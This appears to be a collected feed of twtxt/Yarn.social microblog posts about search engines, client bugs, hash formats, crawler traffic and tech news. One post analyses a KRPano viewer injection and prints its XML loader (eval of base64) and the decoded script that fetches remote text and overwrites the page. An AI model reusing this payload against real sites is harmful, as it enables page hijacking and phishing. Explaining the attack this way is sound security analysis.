@bender@twtxt.net Yes, you’re right. But it’s premium for more than that.
I use a feature I love a lot: customising different searches with different themes or links.
It’s easy to understand with an example. I have a search with the name “Django”. I set its sources: Django documentation, Stack Overflow, the topic “programming” and so on. It’s very quick to find Django solutions.
I also have another way to find my stuff: search my blog and repositories.
I had problems paying for the first months, but now it’s a working tool for me.
@andros@twtxt.andros.dev what makes Kagi “the best search engine”? It is premium, alright. Allegedly you don’t get ads, but pay up-front for it, monthly.
I very much agree with the article. For me, Kagi is the best search engine. A premium experience.
@thecanine@twtxt.net Yeah this is where I think all the hype really falls down. It’s all just a really really expensive search engine and auto-complete 🤦♂️ That’s it!
I just fixed a bug in tt’s reply to parent feature. Previously, when the message tree looked like the following
Message
├╴Reply 1
│ └╴Subreply
└╴Reply 2
and “Reply 2” was selected, pressing A to reply to the parent should have picked “Message”. However, a reply to “Reply 2” was composed instead. The reason was a safety guard, introduced as a precaution, that aborted the parent search at “Subreply” because its subject didn’t match that of “Reply 2”. It was originally intended to abort on a completely different message conversation root. Just in case. Turns out that this thought was flawed.
Fixing bugs by only removing code is always cool. :-)
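A minimal sketch of a parent search that gives the expected result for the tree above. This is not tt’s actual code: the `Row` structure, its `depth` field and the `find_parent` function are assumptions made up for illustration. It walks upwards from the selected row and takes the first row with a smaller depth, without any subject check that could abort early.

```python
from dataclasses import dataclass


@dataclass
class Row:
    """One displayed line of the message tree (hypothetical structure)."""
    text: str
    depth: int  # 0 for a conversation root, 1 for a direct reply, and so on


def find_parent(rows, selected):
    """Return the index of the parent of rows[selected], or None for a root."""
    depth = rows[selected].depth
    # Walk upwards and skip siblings and their subreplies (same or deeper depth).
    for i in range(selected - 1, -1, -1):
        if rows[i].depth < depth:
            return i
    return None


rows = [
    Row("Message", 0),
    Row("Reply 1", 1),
    Row("Subreply", 2),
    Row("Reply 2", 1),
]
parent = find_parent(rows, 3)  # "Reply 2" is selected
print(rows[parent].text)  # prints "Message"
```

“Subreply” is simply skipped here because it sits deeper than “Reply 2”, so the walk carries on until it reaches “Message”.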
/ME slipping a note under @klaxzy@klaxzy.net’s keyboard.
Note: “You should check https://marginalia-search.com/ I bet you’ll love it.”
Oddly, in defense of Google keeping Chrome
As much as I’m a fan of breaking up Google, I’m not entirely sure carving Chrome out of Google without a further plan for what happens to the browser is a great idea. I mean, Google is bad, but things could be so, so much worse. OpenAI would be interested in buying Google’s Chrome if antitrust enforcers are successful in forcing the Alphabet unit to sell the popular web browser as part of a bid to restore competition in search, an OpenAI execu … ⌘ Read more
Hmmm there’s a bug somewhere in the way I’m ingesting archived feeds 🤔
sqlite> select * from twts where content like 'The web is such garbage these days%';
hash = 37sjhla
feed_url = https://twtxt.net/user/prologic/twtxt.txt/1
content = The web is such garbage these days 😔 Or is it the garbage search engines? 🤔
created = 2024-11-14T01:53:46Z
created_dt = 2024-11-14 01:53:46
subject = #37sjhla
mentions = []
tags = []
links = []
sqlite>
Timeline of Evolution of Twtxt/Yarn.social:
- 2016 – Twtxt created by John Downey: plain text + HTTP = minimalist microblogging
- 2017–2019 – Community builds CLI tools, but adoption remains niche
- 2020 – Yarn.social launched by @prologic@twtxt.net with federation, threading, UI
- 2021–2023 – Pods sync, user mentions, blocking, search, and media support added
- 2024+ – Yarn.social becomes the reference Twtxt platform, with active federated pods
Damn, the search here is sooo good now 😅
Windows Recall returns, and its companion feature does not keep data on-device
Remember Windows Recall, the Windows feature that would take a screenshot of your desktop every three seconds, stored them in a database, and then let you search through them at later dates? The feature has been hobbled by implementation problems, security issues, and privacy troubles, and has been released in preview and pulled since its original unveiling. Well, it’s back in … ⌘ Read more
Anyway, this was a good use for search btw. I couldn’t find my Twt, so I just quickly searched for it and, bingo, I found it in a snap! 🫰
@prologic@twtxt.net, from IRC:
- Saving preferences is failing. Specifically trying to save “Open Links” on the same window. For sure it isn’t happening. Check errors on browser’s console.
- Search results pagination is broken. Search for “twtxt.net” and see it. Also, picking oldest/newest makes no difference on that search query.
@prologic@twtxt.net I can live without highlights. Actually, I prefer not to have them. A good search is all I want.
Search syntax appears to be:
hello
"hello world"
hello AND world
hello OR world
hello NOT world
"this is a phrase"
@prologic@twtxt.net pretty neat, search actually works now!
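A small sketch of how the queries listed above could be turned into search links. The base URL and the `q` parameter are taken from a twtxt.net search link quoted elsewhere in this feed; the helper name `build_search_url` is made up, and whether the pod accepts every operator exactly like this is an assumption.

```python
from urllib.parse import urlencode

# Base URL and "q" parameter as seen in a twtxt.net search link in this feed.
SEARCH_URL = "https://twtxt.net/search"


def build_search_url(query):
    """Percent-encode a query string and append it to the search URL."""
    return f"{SEARCH_URL}?{urlencode({'q': query})}"


print(build_search_url('"hello world"'))
# https://twtxt.net/search?q=%22hello+world%22
print(build_search_url("hello AND world"))
# https://twtxt.net/search?q=hello+AND+world
```

Phrase queries keep their double quotes, which end up as `%22` in the link.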
@lyse@lyse.isobeef.org I’m open to other suggestions 🤣 But hopefully adding the additional prompt, not allowing it to enter shell history and removing it from my shell history will prevent me from doing such silly things in haste by pressing ^R and using fuzzy search, which you sometimes get wrong if you type fast 😑
FYI: I’ve re-opened up search for anonymous use. So things like this now work without having to have an account on this pod or login. 👌 #search #twtxt
@prologic@twtxt.net If it develops, and I’m not saying it will happen soon, perhaps Yarn could be connected as an additional node. Implementation would not be difficult for any client or software. It will not only be a backup of twtxt, but it will be the source for search, discovery and network health.
Google, DuckDuckGo massively expand “AI” search results
Clearly, online search isn’t bad enough yet, so Google is intensifying its efforts to continue speedrunning the downfall of Google Search. They’ve announced they’re going to show even more “AI”-generated answers in Search results, to more people. Today, we’re sharing that we’ve launched Gemini 2.0 for AI Overviews in the U.S. to help with harder questions, starting with coding, advanced math and multimodal queries, with mor … ⌘ Read more
looks good to me!
About alice’s hash, using SHA256, I get 96473b4f or 96473B4F for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.
Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1}, which is ambiguous about which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1.
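A rough sketch of the idea, under a few assumptions that are not settled in this thread: the hash input is the feed URL encoded as UTF-8, the result is upper-cased, and the twt ID is a plain integer. The function names are made up for illustration.

```python
import hashlib
import re


def url_hash(feed_url):
    """Last 8 hex characters of the SHA256 of the feed URL, upper-cased."""
    digest = hashlib.sha256(feed_url.encode("utf-8")).hexdigest()
    return digest[-8:].upper()


def full_twt_id(feed_url, twt_id):
    """Build a 'full twt ID' in the form URL_HASH_TWT_ID."""
    return f"{url_hash(feed_url)}_{twt_id}"


# Matches the proposed form, for example {reply_to=96473B4F_1}.
REPLY_TO = re.compile(r"\{reply_to=([0-9A-Fa-f]{8})_(\d+)\}")


def parse_reply_to(text):
    """Return (url_hash, twt_id) from a twt, or None if there is no reply_to."""
    match = REPLY_TO.search(text)
    if match is None:
        return None
    return match.group(1).upper(), int(match.group(2))


print(parse_reply_to("{reply_to=96473B4F_1} looks good to me!"))
# ('96473B4F', 1)
```

With a single token like this, tracking replies across a file is one plain-text search for the full twt ID.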
@prologic@twtxt.net Of course you don’t notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley’s message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]”… in it. This text in square brackets is repeated numerous times. If you search his feed for closing square bracket followed by an opening square bracket (][) you will find a bunch more of these. It goes without question he never typed that in his feed. My client saves each twt hash I’ve explicitly marked read. A few days ago, I got plenty of apparently years old, yet suddenly unread messages. Each and every single one of them containing this repeated bracketed text thing. The only conclusion is that something messed up the feed again.
@prologic@twtxt.net @xuu@txt.sour.is There:
Just search for ][ in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.
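The same search can be scripted. This is only a sketch: it works on feed text that has already been downloaded, the function name is made up, and the sample lines below are invented for illustration rather than copied from the real feed.

```python
def lines_with_adjacent_brackets(feed_text):
    """Return (line_number, line) pairs for feed lines that contain ']['."""
    return [
        (number, line)
        for number, line in enumerate(feed_text.splitlines(), start=1)
        if "][" in line
    ]


# Invented sample lines, not taken from the actual feed.
sample = (
    "2023-01-01T10:00:00Z\tA normal twt\n"
    "2023-01-02T10:00:00Z\t[Scheduled][Scheduled] Some other twt\n"
)
for number, line in lines_with_adjacent_brackets(sample):
    print(number, line)
```

Only the second sample line is reported, since it is the only one with a closing bracket directly followed by an opening one.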
reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:
- (810) bingbot
- (641) Googlebot
- (624) http://www.google.com/bot.html
- (545) DotBot
- (290) GPTBot
- (106) SemrushBot
- (84) AhrefsBot
- (62) MJ12bot
- (60) BLEXBot
- (55) wpbot
- (37) Amazonbot
- (28) YandexBot
- (22) ClaudeBot
- (19) AwarioBot
- (14) https://domainsbot.com/pandalytics
- (9) https://serpstatbot.com
- (6) t3versionsBot
- (6) archive.org_bot
- (6) Applebot
- (5) http://search.msn.com/msnbot.htm
- (4) http://www.googlebot.com/bot.html
- (4) Googlebot-Mobile
- (4) DuckDuckGo-Favicons-Bot
- (3) https://turnitin.com/robot/crawlerinfo.html
- (3) YandexNews
- (3) ImagesiftBot
- (2) Qwantify-prod
- (1) http://www.google.com/adsbot.html
- (1) http://gais.cs.ccu.edu.tw/robot.php
- (1) YaK
- (1) WBSearchBot
- (1) DataForSeoBot
i have placed some middleware to reject these for now but it is not a foolproof solution.
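a sketch of what such a middleware could look like, written as a plain WSGI wrapper. this is not the middleware mentioned above; the class name and the choice of blocked names (picked from the list) are assumptions for illustration.

```python
# A few names from the list above; extend as needed.
BLOCKED_AGENTS = ("GPTBot", "ClaudeBot", "SemrushBot", "AhrefsBot", "MJ12bot")


class RejectBots:
    """WSGI middleware answering 403 when the User-Agent names a blocked bot."""

    def __init__(self, app, blocked=BLOCKED_AGENTS):
        self.app = app
        self.blocked = tuple(name.lower() for name in blocked)

    def __call__(self, environ, start_response):
        agent = environ.get("HTTP_USER_AGENT", "").lower()
        # Case-insensitive substring match against the blocked names.
        if any(name in agent for name in self.blocked):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Forbidden\n"]
        # Everything else is passed through to the wrapped application.
        return self.app(environ, start_response)
```

it only looks at the User-Agent header, which any client can change, so it shares the same weakness: a bot that lies about its name gets through.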
Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.
Reading “Man’s search for meaning” by Viktor E. Frankl
Unit Circle
⌘ Read more
@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more
Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the over … ⌘ Read more
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer. the xml parameter has a url that contains the following:
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omitted part above is the base64-encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch the text at the url https://sour.is/superhax.txt and replace the document content with it.
@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can’t afford to run the search engine right now on the remaining two nodes 😢😢
@prologic@twtxt.net uhhh what happened to search.twtxt.net
nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn’t find anything related when I searched for it.
@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.
@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, a search API?
I remembered one ISP that disallows IRC stuff on its servers. By searching I found that many ISPs equate IRC with proxies and doorways. This is unfair!
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
… it even shows @sorenpeter@darch.dk’s article from 2020 in search results
@prologic@twtxt.net I cannot… believe… It took me a “Single Search Query” to get HOOKED!! 🤩 Bonus: tried it from terminal too and it works just 👌